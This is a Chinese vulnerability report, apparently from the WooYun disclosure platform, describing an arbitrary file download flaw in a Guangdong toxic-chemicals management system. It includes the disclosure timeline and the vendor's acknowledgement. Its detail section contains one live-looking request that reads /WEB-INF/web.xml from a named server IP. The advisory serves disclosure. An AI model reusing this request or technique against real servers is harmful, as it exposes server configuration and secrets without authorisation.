漏洞概要
关注数(24)
关注此漏洞
漏洞标题:广东省剧毒化学品治安管理信息系统任意文件下载漏洞
漏洞作者: 网监
提交时间:2013-05-07 16:34
修复时间:2013-06-21 16:34
公开时间:2013-06-21 16:34
漏洞类型:网络敏感信息泄漏
危害等级:低
自评Rank:1
漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理
Tags标签:
无
漏洞详情
披露状态:
2013-05-07: 细节已通知厂商并且等待厂商处理中
2013-05-09: 厂商已经确认,细节仅向厂商公开
2013-05-19: 细节向核心白帽子及相关领域专家公开
2013-05-29: 细节向普通白帽子公开
2013-06-08: 细节向实习白帽子公开
2013-06-21: 细节向公众公开
简要描述:
剧毒化学品治安管理信息系统任意文件下载漏洞
详细说明:
http://61.144.19.121:5600/down/detailLocalFile.jsp?filename=/WEB-INF/web.xml&name=%D7%E9%D6%AF%BB%FA%B9%B9%B4%FA%C2%EB%D6%A4.jpg&A83C69FBA585B0CA06ADBAA19CC43EF36=CpnvRLGdHjTqQY7mypL8RWTBLy7DC8cvQ0NvTSfYfmLvLdqWyPZ8!-213033169!1367868989698
。。。以下省略
漏洞证明:
修复方案:
版权声明:转载请注明来源 网监@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:3
确认时间:2013-05-09 12:37
厂商回复:
感谢您的支持,欢迎继续测试
最新状态:
暂无